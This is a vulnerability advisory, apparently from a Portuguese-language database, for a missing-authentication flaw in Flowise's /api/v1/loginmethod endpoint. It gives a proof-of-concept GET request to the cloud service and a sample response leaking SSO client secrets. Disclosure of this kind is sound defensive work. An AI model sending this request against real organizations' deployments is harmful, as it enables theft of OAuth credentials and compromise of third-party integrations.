PT-2026-35299 · Npm · Flowise
Publicado
2026-04-16
·
Atualizado
2026-04-16
CVSS v3.1
5.3
Média
| Vetor | AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
Summary
I have discovered a critical Missing Authentication vulnerability on the /api/v1/loginmethod endpoint. The API allows unauthenticated users (guests) to retrieve the full SSO configuration of any organization by simply providing an organizationId. The response includes sensitive OAuth credentials (Client Secrets) in cleartext.
PoC
The following request can be sent by anyone on the internet without any cookies or authorization headers.
Request
http
GET /api/v1/loginmethod?organizationId=<any organization id> HTTP/2
Host: cloud.flowiseai.com
Accept: application/json
Content-Type: application/jsonResponse: The server returns 200 OK with sensitive credentials:
json
{
"providers": [
{
"id": "a04ba769-b810-481d-8d6b-84f8c377dea5",
"organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
"name": "azure",
"config": {
"tenantID": "",
"clientID": "",
"clientSecret": ""
},
"status": "disable",
"createdDate": "2025-12-26T18:52:33.453Z",
"updatedDate": "2025-12-26T19:31:56.087Z",
"createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
"updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
},
{
"id": "eda8bd90-1c45-4aca-933f-3a53d9be4161",
"organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
"name": "google",
"config": {
"clientID": "123455",
"clientSecret": "123455"
},
"status": "enable",
"createdDate": "2025-12-26T18:52:33.453Z",
"updatedDate": "2025-12-26T19:31:56.087Z",
"createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
"updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
},
{
"id": "0d238df0-c89c-4733-bf57-6ec06f58c7e7",
"organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
"name": "auth0",
"config": {
"domain": "",
"clientID": "",
"clientSecret": ""
},
"status": "disable",
"createdDate": "2025-12-26T18:52:33.453Z",
"updatedDate": "2025-12-26T19:31:56.087Z",
"createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
"updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
},
{
"id": "e060ae88-c7f4-4b7c-9bdc-5321963a1648",
"organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
"name": "github",
"config": {
"clientID": "",
"clientSecret": ""
},
"status": "disable",
"createdDate": "2025-12-26T18:52:33.453Z",
"updatedDate": "2025-12-26T19:31:56.087Z",
"createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
"updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
}
],
"callbacks": [
{
"providerName": "azure",
"callbackURL": "https://cloud.flowiseai.com/api/v1/azure/callback"
},
{
"providerName": "google",
"callbackURL": "https://cloud.flowiseai.com/api/v1/google/callback"
},
{
"providerName": "auth0",
"callbackURL": "https://cloud.flowiseai.com/api/v1/auth0/callback"
},
{
"providerName": "github",
"callbackURL": "https://cloud.flowiseai.com/api/v1/github/callback"
}
]
}Affected Deployments
- FlowiseAI Cloud (cloud.flowiseai.com)
- Self-hosted FlowiseAI instances where the /api/v1/loginmethod endpoint is exposed
Impact
An unauthenticated attacker can harvest sensitive API secrets (Google, Microsoft, GitHub Client Secrets) from any organization on the cloud platform. This leads to complete compromise of the organization's third-party integrations and potential data breaches.
Correção
Cleartext Storage of Sensitive Information
Missing Authentication
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Identificadores relacionados
Produtos afetados
Flowise